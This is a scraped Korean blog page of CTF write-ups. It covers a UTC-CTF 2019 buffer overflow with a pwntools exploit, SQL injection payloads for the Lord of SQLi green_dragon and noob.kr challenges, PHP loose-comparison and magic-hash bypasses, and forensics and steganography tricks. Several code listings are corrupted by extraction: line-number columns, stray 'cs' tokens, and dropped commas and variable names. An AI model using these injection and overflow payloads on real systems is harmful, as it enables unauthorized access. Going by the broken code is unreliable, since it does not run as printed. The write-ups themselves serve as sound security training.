Gt5wd4CpIMQxF4GpCxTufMQwByGLZMrpM03LCgGqBe3wBN3cay3s1z3pnt3YKMjXl45LKe5ufNmwBb3y7M7cCwhSBeTpCJrX7MQcF4Qpat3Yl07p+0Qpat3Yl43pMgTyU45uJPrXZMQLCtQcCPrp1IQyft7cF4QyCzQpitGLU43x543xJMrXKt3uF47pnzGLUgrVJM7X76Qc0MGSBoTLBbGLr43unoTpMgGLU47xCwGqBo3xJkTuKMQcCPrXG13pJMQcns3pF47p+45yZt5YU/rpngGSBx5LZt3yCkrXKM5xIgTLn1GLU47xCwGqB1QxCPrXK6rpKtQx71TLfMrXKbGqBsGu7t3cJt3cQ45uJPrpCgGXU43x545qB0GLfk5u7MhSBt3cf/7uKt3cQ45yCe7pMgGwB0GLfk5u7MQwBt3sBb5uicrpngGSBkGuJPTuJYrXKbGqBkGuf63cl4Qpnw7SBcTLZk7SBI3cl45uKPTuJYrpJ63YfM3YfMrXBIGpKt3cQ45Ll45caeTSBM3cKkhsBFTpF43pne7pCwrXBw5ufeTufMrXZMQyC/7pCPrpMgrXKbGqBy3yZ/GSBy3xJPGLZkrpMg5xMPGuJehsBFTpF4qez0fwz4TuJeQcaP7ufMGSBt3sBeTpF43uMPhOVJfOBkhSBy5LU47pIMrpGtQYfernFgFwd45xMzTpCwrp1I5xIt3cF47pII7SBy5LU45xagQxMPGLZMGSBk5uGMrpnY5uMgQyl4TxJ67xd0QpiITuJeGLIerpne7pnoTwdESPf/5LfkTufI3SBoTLBbGLZkrpnwGqBejLBt5xn/3XP47YC/3cCw5uZ/GqBe3wBN3cay3s1z3pnt3YKMjXl45LKe5ufNhsBp3yr4GLII3LB/Gqz45qBA5uCk5Lr45xMzTpCwrpfI3sBsGqBk3xixGul47Lft3cQ45qBkTuJY3pF43pCe7pCwrpacrpf6QYZMQyB63cKt3cQ4QpiITuJeGLIerpngGSBoTLBbGLZeGLIerXK6rpKM5yZJQXl4GuJeTLZM3XPgrVV4GxCgGLZI3SB03xJ65uizTpnsGLKt5wBk7uZk7pMe7LKt3xd45xMzTpCwrpJMGuKkrXfM7cCw5uz45xIIQcno7pCwrXBITLZkrpngGSBk3x1Mrp71GLfkTuJYrpMcrXKbGLZMrpnwGqBcGL7MQsBeTpngrArxrpKtQyKt3cferXBITLZkhMaWL1aWL1+EKciIGy0eTpMkLxMkLyK631aMjMac3yZWCCat3cMeHye=
'''
 
import base64, string
table = string.ascii_uppercase + string.ascii_lowercase + string.digits + '+/'
table_dict = dict.fromkeys(table, '?')
#rtable = ''.join(random.sample(table,len(table)))
orig=base64.b64encode(story)
 
for i in range(0len(orig)-4):
    table_dict[orig[i]] = tran[i]
    #print(orig[i]+";;"+tran[i])
 
tdv = table_dict.values()
rtable=""
for j in range(len(table)):
    rtable += table_dict[table[j]]
print(rtable)
tb=string.maketrans(rtable,table)
btran = tran.translate(tb)
print(base64.b64decode(btran))
 
cs

 

728x90
반응형

'WAR GAME > System32.kr' 카테고리의 다른 글

System32.kr [RSA108] 풀이  (0) 2021.01.19
System32.kr [RSA107] 풀이  (0) 2021.01.18
System32.kr [EZB64] 풀이  (0) 2019.12.28
System32.kr [RSA106] 풀이  (0) 2019.05.19
System32.kr [RSA104] 풀이  (0) 2019.05.19
System32.kr [RSA105] 풀이  (0) 2019.05.19
728x90
반응형

https://ctftime.org/event/948

 

UTC-CTF 2019 Teaser

금요일, 20 12월 2019, 23:00 UTC — 토요일, 21 12월 2019, 23:00 UTC  On-line A UTC-CTF event. Format: Jeopardy  Official URL: https://utc-ctf.club/ Future weight: 0.00  Rating weight: 0.00  Event organizers 

ctftime.org


PWN

Simple bof (baby)

Want to learn the hacker's secret? Try to smash this buffer!

You need guidance? Look no further than to Mr. Liveoverflow. He puts out nice videos you should look if you haven't already

By: theKidOfArcrania

nc chal.utc-ctf.club 35235

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
 
// Defined in a separate source file for simplicity.
void init_visualize(char* buff);
void visualize(char* buff);
void safeguard();
 
void print_flag();
 
void vuln() {
  char padding[16];
  char buff[32];
  int notsecret = 0xffffff00;
  int secret = 0xdeadbeef;
 
  memset(buff, 0sizeof(buff)); // Zero-out the buffer.
  memset(padding, 0xFFsizeof(padding)); // Zero-out the padding.
 
  // Initializes the stack visualization. Don't worry about it!
  init_visualize(buff); 
 
  // Prints out the stack before modification
  visualize(buff);
 
  printf("Input some text: ");
  gets(buff); // This is a vulnerable call!
 
  // Prints out the stack after modification
  visualize(buff); 
 
  // Check if secret has changed.
  if (secret == 0x67616c66) {
    puts("You did it! Congratuations!");
    print_flag(); // Print out the flag. You deserve it.
    return;
  } else if (notsecret != 0xffffff00) {
    puts("Uhmm... maybe you overflowed too much. Try deleting a few characters.");
  } else if (secret != 0xdeadbeef) {
    puts("Wow you overflowed the secret value! Now try controlling the value of it!");
  } else {
    puts("Maybe you haven't overflowed enough characters? Try again?");
  }
 
  exit(0);
}
 
int main() {
  safeguard();
  vuln();
}
 
cs

 

정말 친절한 bof 문제다..

 

 

 

ex.py

1
2
3
4
5
6
7
8
9
10
from pwn import *
 
= remote("chal.utc-ctf.club"35235)
 
= 0x67616c66
payload = "A"*48 + p32(a)
 
p.recvuntil("Input some text: ")
p.sendline(payload)
p.interactive()
cs

 

 

FLAG : utc{buffer_0verflows_4re_c00l!}

 

 


Crypto

 

RSAcue [not solved]

I heard you like to RSAcue the world. There we go

By: knapstack

 

 

공개키로 publickey.pem이 주어졌다.

 

여기서 n값을 구해내보자! (openssl)

https://stackoverflow.com/questions/3116907/rsa-get-exponent-and-modulus-given-a-public-key

 

RSA: Get exponent and modulus given a public key

I need to encrypt some data using RSA in JavaScript. All of the libraries around ask for an exponent and a modulus, yet I get a single public.key file from my opponent. How do you retrieve the pu...

stackoverflow.com

 

깔끔하게 보는 방법도 나와 있다.

 

 

 

 


MISC

 

 

Optics 1 (baby)

 

I dropped out of my physics class due to boring optical theory. I joined Forensics class thereafter. But, I found Optics there too. Help me clear this class :facepalm:

By: knapstack

 

 

png 파일이 하나 주어지는데, 열려고 하면 열리지 않는다.

 

Hxd로 열어보면 header signuature가 잘못 설정되어 있는 것을 알 수 있다.

 

0x1~0x3이 LOL로 되어 있는데 이를 PNG로 바꿔주면 파일이 정상적으로 열린다.

0x50 0x4e 0x47

 

QR코드 이미지가 나오는데, 이를 스캔해주면 flag가 나온다.

 

 

FLAG: utc{dang_you_know_qr_decoding_and_shit}

 


Sanity Check

 

Join our discord and get a free flag.

 

 

와 공짜 플래그

 

FLAG : utc{whats_discord_lol}

 


REVERSING

 

Strings (baby)

 

Itz not giving me flag...

GIMMME THE FLAG

By: theKidOfArcrania

 

 

strings 라는 파일이 주어진다.

 

 

HxD로 열어보면 ELF 헤더 시그니쳐를 확인 할 수 있다.

Open with HxD, you can find ELF header signature.

So, this file's format is ELF.

 

 

 

 

 

그리고 exeinfo PE를 통해 64bit elf 라는 것도 알 수 있다.

 

 

64bit elf 파일이기 때문에, ida 64bit로 연다.

 

문제 제목이 strings이기 때문에, 문자열들을 확인해 주면 된다.

Check out strings!

 

 

main함수에는 fake flag가 있다.

you can find fake flag in main FUNC.

 

 

 

 

real flag는 여기서 찾을 수 있다.

Real flag is in here!

 

 

FLAG : utc{that_waz_ezpz}


 

 

 

 

 

 

 

 

728x90
반응형
728x90
반응형

Forensics

 

I AM STEGO!!

50

hxd로 열어서 끝부분에서 패스워드를 찾을 수 있다.

 

openstegoflag.txt 추출

 

 

 

Thinking

100

 

.zip으로 바꾸고 ppt> mediaFLAG.PNG가 존재한다.

 

 

You are in me

100

 

jpgfooter 시그니쳐ff d9를 찾으면 다음에 MZ 시그니쳐가 보인다.

카빙해서 IDA로 보면 xor 연산을 하는 것을 알 수 있다.

간단히 코드 짜서 xor 돌리면 플래그 나온다.

 

 

 

Header Trick

150

I think the header of this flag is wrong...

 

라고 한다. 압축파일 내용을 보면, 파일이 두 개가 존재하는데, flag.txt는 암호가 걸려있고, 다른 하나는 걸려있지 않다.

 

그렇다는 것은 실제로 패스워드는 걸려있지 않지만, flag.txt만 헤더 조작을 통해 암호화가 걸린 것 처럼 만든 것이다.

 

hxd를 통해 해더를 분석해보면 헤더가 다른 것이 보인다.

 

 

 

flag.txt만 00 09 08 08 00 이고 나머지는 00 00 00 08 00임을 알 수 있다.

 

09 08을 00 00로 덮어주고 열면 된다.

 

 

 

 

Something is inside me?!

200

 

IDA로 까서 strigs에서 보이는 문자열 ascii 85로 디코딩 해주면 된다.

https://cryptii.com/pipes/ascii85-encoding

 

힌트라고 한다면,, <- Guess what it is! There's 85 possibilitys. 여기서 85가 힌트일 듯 하다.

 

 

 

 

 

All your base are belong to newbie

350

 

png footer 시그니쳐 뒤에 elf 시그니쳐가 있다.

카빙후 실행하면 문제를 풀어야 한다. 문제 답은 IDA로 까보면 찾을 수 있다.

728x90
반응형
728x90
반응형

MISC

 

Triple Bass 50

base64 몇 번 돌리면 된다.

 

Honamseon

50

-1_0으로 치환 후,

 

6자리는 앞에 00을

7자리는 앞에 0을 붙여주어 8자리를 만들어 준 뒤에

 

아스키코드로 변환하면 된다.

 

 

Brain JS

150

 

두 개의 과정을 거치면 된다.

 

https://enkhee-osiris.github.io/Decoder-JSFuck/

 

 

JSFuck de-obfuscator

JSFuck decoder, de-obfuscator

enkhee-osiris.github.io

 

https://copy.sh/brainfuck/

 

El Brainfuck

A Brainfuck editor & optimizing interpreter, written in JavaScript. The code is converted to JavaScript code and then run in a web worker, which speeds up execution at lot (try mandelbrot.b for example). Load example program hanoi.bf yapi.b hellom.bf numwa

copy.sh

728x90
반응형
728x90
반응형

Pwnable

It's very simple bof

50

str과 str2 사이에 dummy가 없다고 가정하고 str2 10바이트 채워주고 바로 다음 Hello, world!로 str을 채워주면 된다.

728x90
반응형
728x90
반응형

green_dragon

 

 

녹색 용용이

 

 

 

소스를 보자.

 

 

 

쿼리를 두 번 실행한다.

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\'|\"/i'$_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\.|\'|\"/i'$_GET[pw])) exit("No Hack ~_~");
  $query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']){
    if(preg_match('/prob|_|\.|\'|\"/i'$result['id'])) exit("No Hack ~_~");
    if(preg_match('/prob|_|\.|\'|\"/i'$result['pw'])) exit("No Hack ~_~");
    $query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
    echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
    $result = mysqli_fetch_array(mysqli_query($db,$query2));
    if($result['id'== "admin") solve("green_dragon");
  }
  highlight_file(__FILE__);
?>
cs

 

id와 pw값을 받아서 쿼리를 실행한 후에 결과값이 있으면

결과값의 id와 pw를 이용해서 쿼리를 실행하고 id가 admin이면 문제가 풀린다.

 

 

 

 

\을 이용해서 '을 우회해보았다.

https://los.rubiya.kr/chall/green_dragon_74d944f888fd3f9cf76e4e230e78c45b.php?id=admin\&pw=or%20id=0x61646d696e%23

 

query : select id,pw from prob_green_dragon where id='admin\' and pw='or id=0x61646d696e#'

 

흠.. 반응이 없다.

 

 

아에 prob_green_dragon 테이블에 값이 없는 것으로 보인다.

 

 

 

 

 

 

 

 

 

 

union으로 결과를 합쳐주면 된다.

https://www.w3schools.com/sql/sql_union.asp

 

SQL UNION Operator

SQL UNION Operator The SQL UNION Operator The UNION operator is used to combine the result-set of two or more SELECT statements. Each SELECT statement within UNION must have the same number of columns The columns must also have similar data types The colum

www.w3schools.com

 

 

?id=\&pw=%20union%20select%201,2%23

 

query : select id,pw from prob_green_dragon where id='admin\' and pw=' union select 1,2#'

query2 : select id from prob_green_dragon where id='1' and pw='2'

 

 

query2까지 잘 나온다.

 

이제 query2에서 admin이 나오도록 우회를 시도하면 된다.

 

 

 

 

 

 

 

 

 

 

 

query2를 where id='\' and pw='union select 0x61646d696e#'

으로 만들어주면 된다.

 

id에는 \가 들어가야되고 pw에는 union select 0x61646d696e#이 들어가야 한다.

 

https://www.branah.com/ascii-converter

 

ASCII Converter - Hex, decimal, binary, base64, and ASCII converter

Convert ASCII characters to their hex, decimal and binary representations and vice versa. In addition, base64 encode/decode binary data. The converter happens automatically.

www.branah.com

여기서 hex값으로 바꿔서 넣어주자.Convert white space characters 에 체크, Remove 0x에 체크하고

나온 hex값 앞에 0x를 붙여주면 된다.

 

 

 

 

 

 

최종 url

?id=\&pw=%20union%20select%200x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23

728x90
반응형
728x90
반응형

Web

 

Compare

100

php의 느슨한 비교 취약점

 

넘기는 값을 배열로 넘겨주면 된다.

 

직접 html코드에서 name을 password[] 로 바꿔주고 보내면 된다.

 

 

 

Simple SQL

150

sql injection

소스:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
    include "./conn.php";
 
    $id = $_GET['id'];
    $pw = $_GET['pw'];
    
    if(preg_match('/[a-zA-Z0-9]/i'$id|| preg_match('/[a-zA-Z0-9]/i'$pw)) exit("빼애애ㅐ애애ㅐㅐ액!!!!");
    if(preg_match('/\||&| |0x|\t|admin|-|\'/i'$id|| preg_match('/\||&| |0x|\t|admin|-|\'/i'$pw)) exit("빼애애ㅐ애애ㅐㅐ액!!!!");
 
    $query = "select * from simple_sql where id='${id}' and pw='${pw}'";
 
    echo "<hr><b>Query : {$query}</b><hr><br>";
 
    $result = mysqli_fetch_array(mysqli_query($conn,$query));
 
    if($result){
        echo $flag;
        exit;
    }
    echo "<hr><br>";
    highlight_file(__FILE__);
?>
cs

소문자, 대문자, 숫자 모두 필터링에 몇몇개의 문자열들도 필터링한다.

 

 

\은 필터링하지 않기 때문에 \을 넣어서 id='\'로 만들면 뒤 '은 문자열 취급되어 pw=' 에 있는 ' 까지 문자열이 된다.

 

 id='\' and pw='=""#  로 만들어줬더니 풀렸다.

 

http://noob.kr/Simple_SQL.php?id=\&pw==%22%22%23

 

원래는 false가 떠야하지만 php처럼 sql에서도 타입 저글링이 가능하여 true가 된다. 

 

 

 

 

 

Simple md(5-1)

170

 

소스:

 

1
2
3
4
5
6
7
8
9
<?php
    if($_GET['md4'== hash("md4"$_GET['md4'])){
        echo "<hr><b>".$flag."</b><hr><br>";
    }else{
        echo "<hr><b>False...</b><hr><br>";
    }
 
    highlight_file(__FILE__);
?>
cs

 

입력값과 md4 hash 값이 같아야 한다.

 

느슨한 비교 == 을 사용했기 때문에 매직해쉬를 사용하면 된다.

 

 

아래 글에 직접 값을 찾으신 분이 계시다.

https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4

 

0e251288019 을 넣어주면 된다고 한다.

728x90
반응형
728x90
반응형

http://52.79.224.215

 

Multimedia Forensic

 

Welcome Forensic World

30

 

hxd로 열어보면 된다.

 

 

Where_is_flag

50

 

jpg시그니쳐 9바이트 채워주면 된다.

 

 

 

 

Dark web

100

hint : base

 

힌트가 base이다. base32나 base64라고 생각하고, 패딩 문자열 ==hxd를 통해 검색하면, 바로 찾을 수 있다.

 

JYYDAYSDKRDHWZCAOJVV65ZTMJPUSNK7MRAG4OLFOIYHKUZBEF6Q====

 

이를 base32로 디코딩하면 된다.

 

 

 

 

What is docx?

100

찾기로 flag 가 하나 나오는데 그건 fake이다.

 

.zip으로 바꾸면 암호걸린 flag.zip이 나오는데 key는 media폴더에서 찾을 수 있다.

 

 

 

Please open steganography

200

 

문제의 제목에서 open 을 통해 open stego를 써야된다는 것을 알 수 있다.

 

패스워드는 해당 png파일을 hxd로 열어서 마지막쯤에 있는 OPENLOCK 을 사용하면 된다.

 

추출하면 flag.txt가 추출된다.

728x90
반응형

+ Recent posts